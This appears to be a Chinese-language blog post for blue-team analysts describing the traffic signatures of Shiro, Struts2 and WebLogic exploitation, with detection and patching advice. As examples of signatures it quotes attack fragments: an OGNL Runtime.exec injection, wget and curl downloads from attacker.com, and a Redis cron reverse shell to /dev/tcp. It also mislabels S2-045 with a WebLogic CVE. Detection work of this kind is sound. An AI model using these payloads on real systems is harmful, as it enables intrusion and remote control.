shiro、struts2、weblogic特征流量分析

已于 2025-06-03 03:18:22 修改
阅读量776 收藏 8
点赞数 14
文章标签: struts 网络安全 web安全
于 2025-06-03 03:14:29 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2302_81945070/article/details/148389863
版权

文章目录

  • 一、Shiro漏洞流量特征
    • 1. **身份验证阶段的特征**
    • 2. **攻击阶段的特征**
    • 3. **检测与防御建议**
  • 二、Struts2漏洞流量特征
    • 1. **请求特征**
    • 2. **响应特征**
    • 3. **典型案例**
    • 4. **防御建议**
  • 三、WebLogic漏洞流量特征
    • 1. **XMLDecoder反序列化(CVE-2017-10271)**
    • 2. **SSRF漏洞(CVE-2014-4210)**
    • 3. **T3协议特征**
    • 4. **防御建议**
  • 四、总结对比

一、Shiro漏洞流量特征

核心漏洞:Shiro-550(CVE-2016-4437)与Shiro-721(Padding Oracle攻击)

1. 身份验证阶段的特征

  • 登录失败:返回包必含 Set-Cookie: rememberMe=deleteMe,无论是否勾选“记住我”。
  • 登录成功:勾选“记住我”时,请求包持续携带长文本rememberMe字段;未勾选时仅返回包出现deleteMe
  • 框架探测:工具爆破时主动添加Cookie: rememberMe=yes,通过返回包是否含deleteMe判断Shiro存在。

2. 攻击阶段的特征

  • 密钥爆破
    • 失败:返回rememberMe=deleteMe
    • 成功:返回包无deleteMe,且设置新rememberMe值(长度较短)。
  • 反序列化攻击
    • Shiro-550rememberMe值异常长(Base64编码的AES加密反序列化数据),响应包含Base64加密的命令回显。
    • Shiro-721:利用有效Cookie爆破密钥,攻击包中rememberMe长度剧增,成功时触发DNSLog请求。
  • 内存马注入rememberMe值超长,响应包出现$$$等蚁剑/冰蝎连接特征。

3. 检测与防御建议

  • 检测:监控rememberMe长度突变、deleteMe高频返回、DNSLog域名请求。
  • 防御:升级Shiro≥1.2.5(550)或≥1.4.2(721),禁用硬编码密钥,开启AES-GCM加密模式。

二、Struts2漏洞流量特征

典型漏洞:S2-045(CVE-2017-10271)、S2-016(命令执行)

1. 请求特征

  • OGNL注入位置
    • 头部注入:如S2-045在Content-Type插入恶意OGNL表达式(如 %{(#_='multipart/form-data'))。
    • 参数注入:S2-016在URL参数拼接redirect:${@java.lang.Runtime@getRuntime().exec('id')}
  • 编码混淆:使用Unicode或URL编码绕过检测(如 \u0023 代替 #)。

2. 响应特征

  • 攻击成功
    • 状态码500,返回Java栈错误(如 ognl.OgnlException);
    • 命令执行成功时回显命令输出(如 uid=0(root))。
  • 横向攻击痕迹:漏洞利用后常下载恶意脚本(如 wget http://attacker.com/x.py),并发动SYN Flood等攻击。

3. 典型案例

某企业服务器因Struts2漏洞被植入Perl脚本,持续向意大利IP(62.149.175.81)发送SYN包,导致防火墙CPU飙升至80%。

4. 防御建议

  • 禁用动态方法调用(struts.enable.DynamicMethodInvocation=false)。
  • 升级至Struts 2.5.26+,过滤OGNL表达式关键词(如 #@)。

三、WebLogic漏洞流量特征

关键漏洞:XMLDecoder反序列化(CVE-2017-10271)、SSRF(CVE-2014-4210)

1. XMLDecoder反序列化(CVE-2017-10271)

  • 请求特征
    • 路径访问 /wls-wsat/*PortType(如 /CoordinatorPortType);
    • POST包含恶意XML标签(如 <object class="java.lang.ProcessBuilder">),明文写入命令(如 curl http://attacker.com/shell)。
  • 响应特征
    • 成功时返回HTTP 202,写入WebShell路径(如 /servers/AdminServer/tmp/_WL_internal/wls-wsat/*/test.jsp)。

2. SSRF漏洞(CVE-2014-4210)

  • 请求特征:访问路径 /uddiexplorer/SearchPublicRegistries.jsp,参数含内网地址(如 operator=http://192.168.1.1:6379);
  • Redis利用:注入换行符(%0D%0A)执行Redis命令(如 SET cron "\n* * * * * bash -i >& /dev/tcp/attacker/port 0>&1")。

3. T3协议特征

  • 攻击流量:目标端口7001,TCP载荷含 t3 12.2.1\n 协议头,后续为序列化payload;
  • 设备告警:安全设备常基于序列化操作触发误报(需结合漏洞链完整性研判)。

4. 防御建议

  • 删除 wls-wsat.war 组件,禁用T3外网访问;
  • 升级至官方安全版本,监控非常规路径访问(如 /uddiexplorer)。

四、总结对比

特征维度ShiroStruts2WebLogic
攻击标识rememberMe长度突变OGNL表达式(#{}XML标签/wls-wsat路径
关键字段Cookie字段Content-Type/URL参数T3协议头/XML结构
成功响应Base64回显/无deleteMe500错误/命令输出202状态/WebShell路径
典型漏洞Shiro-550/721S2-045/S2-016CVE-2017-10271/SSRF

防御核心

  • Shiro:禁用默认密钥 + 会话签名验证;
  • Struts2:关闭动态方法调用 + OGNL沙盒;
  • WebLogic:删除冗余组件 + 网络隔离T3端口。

掌握这些流量特征,可通过WAF规则(如拦截rememberMe超长值)和流量审计工具(如监控/wls-wsat访问)实现精准检测。在高级攻防对抗中,需结合行为分析(如异常外联)识别混淆后的攻击流量。

桑晒.
关注
2024年hw蓝队初级面试总结_weblogic反序列化流量特征(1)
2401_84254530的博客
05-02 2506
最近遍览了各种网络安全类的文章,内容参差不齐,其中不伐有大佬倾力教学,也有各种不良机构浑水摸鱼,在收到几条私信,发现大家对一套完整的系统的网络安全从学习路线到学习资料,甚至是工具有着不小的需求。相比起繁琐的文字,还是生动的视频教程更加适合零基础的同学们学习,这里也是整理了一份与上述学习路线一一对应的网络安全视频教程。当然,当你入门之后,仅仅是视频教程已经不能满足你的需求了,你肯定需要学习各种工具的使用以及大量的实战项目,这里也分享一份。,毕竟实战是检验真理的唯一标准嘛~最后就是项目实战,这里带来的是。
护网面试-JAVA漏洞和中间件篇
qq_52579508的博客
04-17 602
中间件IIS漏洞IIS PUT漏洞IIS Server 在 Web 服务扩展中开启了 WebDAV ,配置了可以写入的权限,造成任意文件上传。版本:IIS6.0短文件名猜解漏洞IIS的短文件名机制,可以暴力猜解短文件名,访问构造的某个存在的短文件名,会返回404,访问构造的某个不存在的短文件名,返回400。局限性1) 此漏洞只能确定前6个字符,如果后面的字符太长、包含特殊字符,很难猜解;2) 如果...
应急响应全栈
qq_29437513的博客
07-25 2755
应急响应全栈
Apache Shiro流量特征及漏洞利用
qq_53218512的博客
06-02 1740
Apache Shiro是一个强大易用的Java安全框架,提供了认证、授权和会话管理等功能。Shiro框架直观、易用,同时也能提供更健壮的安全性。
shiro权限绕过&流量特征
最新发布
m0_74013263的博客
03-14 803
进行处理时会将url进行截断,然后对/xxx/..进行权限校验,校验通过之后再由springboot进行路由分发,然后springboot会将url /xxx/..;假如/admin接口设置了authc拦截器,访问/admin将会被进行权限判断,如果请求的url为/admin/呢,/*的url路径表达式将无法正确匹配,放行。然后进入到spring(servlet)拦截器,而spring中/admin形式和/admin/形式的url访问的资源是一样的,从而导致了绕过。/admin/返回/admin/
shiro漏洞复现及其攻击流量分析
akxnxbshai的博客
04-09 8896
分析一下shiro的攻击流量特征
hw蓝队初级面试总结
热门推荐
G208_522的博客
05-27 1万+
1、sql注入原理、分类、绕过 原理:产生sql注入漏洞主要因为没有对接受到的参数进行过滤、验证和处理直接拼接到了sql语句中,然后直接执行该sql语句,这样就会导致恶意用户传入一些精心构造的sql代码,与后台sql语句拼接后形成完整的sql语句执行,达到攻击者的目的。 分类:我们可以把sql注入直接的分为字符型和数字型,主要特点就是在进行sql注入的时候是否需要闭合传参的单引号,不需要闭合说明是数值型,反之就是字符型;还可以将sql注入分为有回显的注入和无回显的注入,无回显的注入又别称为盲注,盲注有三大
HW面试常问的流量特征
weixin_46365325的博客
07-19 672
log4j 是 javaweb 的日志组件,用来记录 web 日志,特征是 ${jndi:ldap://url},去指定下载文件的 url 在搜索框或者搜索的 url 里面,加上 ${jndi:ldap://127.0.0.1/test} ,log4j 会对这串代码进行表达式解析,给 lookup 传递一个恶意的参数指定,参数指的是比如 ldap 不存在的资源 $ 是会被直接执行的。2.查看告警的告警类型,如果是sql注入可能导致的数据库异常,或者ddos导致网络带宽占用率异常高,则初步判断为真实告警。
PotatoTool一款功能强大的网络安全综合工具支持免杀、自定义内存马、提权、扫描、一键解密、AI分析、溯源等等
2202_75361164的博客
02-08 953
PotatoTool工具是一款功能强大的网络安全综合工具,分为红队和蓝队模块。红队模块功能:信息收集、漏洞扫描、免杀、自定义内存马、命令生成、命令查询、KB提权查询、进程分析、信息生成、扩展模块蓝队模块功能:一键解密、专项加解密、IP信息筛选、AI分析、反编译、区块链溯源、归属地查询、文件元信息、扩展模块旨在为安全从业者、红蓝对抗人员和网络安全爱好者提供全面的网络安全解决方案。红蓝对抗渗透测试流量监测流量研判流量审计CTF竞赛红队模块截图蓝队模块截图。
万字渗透测试入门知识点,自学查漏补缺
yjwangan的博客
10-24 1252
万字渗透测试入门知识点,自学查漏补缺
网络安全相关面试题(hw)
XLbb的博客
05-23 1590
7、敏感信息收集,如 github 源码、用 7kb、破壳扫源代码泄露(.hg、.git、cvs、svn、.DS_store 源代码泄露)、google hack、接口信息泄露、社工信息泄露、邮箱地址信息收集、网盘搜索、钟馗之眼、天眼查、威胁情报、微步在线等。3、可以使用 D 盾_web 查杀工具、火绒剑、 XueTr 等工具进行判 断可疑进程(如蓝色、红色进程、没有签名验证信息的进程、没有 描述信息的进程、进程的属主、进程的路径是否合法、 CPU 或内存资源占用长时间过高的进程)
struts2shiro集成(实例)
04-13
NULL 博文链接:https://javastudyeye.iteye.com/blog/1676769
struts2shiro(by annotation)
12-29
1、shiro+strut2 2shiro注解 + struts2注解 2shiro 缓存:因为使用了缓存,第一使用admin登录,如果没有logout,再用test登录,则test具有admin的权限
struts2知识点总结
benmin1的博客
06-29 3279
目录 什么是框架... 3 struts2工作原理... 3 使用xml和注解两种方式声明一个action. 4 web.xml中配置struts2. 4 使用包的命名空间来决定映射到动作的url:5 从表单页面通过action再到结果页面数据的传递... 6 提交表单的页面:... 6 action的动作java类... 6 呈现结果的jsp页面代码片段获取传输的
shiro+冰蝎蚁剑哥斯拉菜刀流量特征
2402_83134109的博客
01-17 510
而冰蝎4.0使用RC4加密算法。此外,冰蝎4.0开放了传输协议的自定义功能,用户可以对流量的加密和解密进行自定义,实现了流量加解密协议的去中心化。Shiro721的ase加密的key为系统随机生成,需要利用登录后的rememberMe去爆破正确的key值。这样做的目的是确保即使Cookie被拦截或盗取,数据也无法被轻易解读,从而增强了。‌:冰蝎3.0使用自定义的二进制协议进行通信,而冰蝎4.0则使用HTTP协议。Shiro550使用已知默认密码,只要有足够的密码,不需要Remember Cookie的。
springcloud流量卫士sentinel 入门(2)流量控制
weixin_44075325的博客
02-27 239
sentine流量控制 设置阈值即可超过阈值访问会提示 阈值为0为不允许访问 自定义失败后的内容 其一方法 public class DemoUrlBlockHandler implements UrlBlockHandler { //自定义超越流量阈值后的内容 @Override public void blocked(HttpServletRequest http...
web渗透工程师——初级面试总结
m0_61506558的博客
10-12 2945
根据sql注入各自的特点可以分为联合注入、二次注入、宽字节注入、堆叠注入等,根据http报文中的不同位置可以有cookie注入、referer注入、x-forwarded-for注入等。产生sql注入漏洞主要因为没有对接受到的参数进行过滤、验证和处理直接拼接到了sql语句中,然后直接执行该sql语句,这样就会导致恶意用户传入一些精心构造的sql代码,与后台sql语句拼接后形成完整的sql语句执行,达到攻击者的目的。大小写绕过 、编码绕过、注释绕过、关键字/关键函数替换、参数污染、缓存区溢出、特殊符号。
Shiro概述
​​
03-15 392
Shiro简介 什么是Shiro? Shiro是apache旗下一个开源框架,它将软件系统的安全认证相关的功能抽取出来,实现用户身份认证,权限授权、加密、会话管理等功能,组成了一个通用的安全认证框架。 Shiro 的特点 Shiro 是一个强大而灵活的开源安全框架,能够非常清晰的处理认证、授权、管理会话以及密码加密。如下是它所具有的特点: 易于理解的 Java Security API; 简单的身份认证(登录),支持多种数据源(LDAP,JDBC 等); 对角色的简单的签权(访问控制),也支持细粒度的鉴权
Apache Shiro反序列化漏洞初学就深入研究+实战
Jietewang的博客
03-22 2585
Apache Shiro反序列化漏洞初学就深入研究+实战 本人心得. 这玩意儿咋说呢!话说在朝阳初升,春日暖阳缓缓升起的时候,在日常流量分析中发现了一个异常流量,经过与度娘私磨半晌才弄明白原来这个包是属于Apache Shiro框架,但历尽千辛万苦,使用已知网络上所有现有的工具都能检测到某网站存在该漏洞,可就是利用漏洞getshe...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值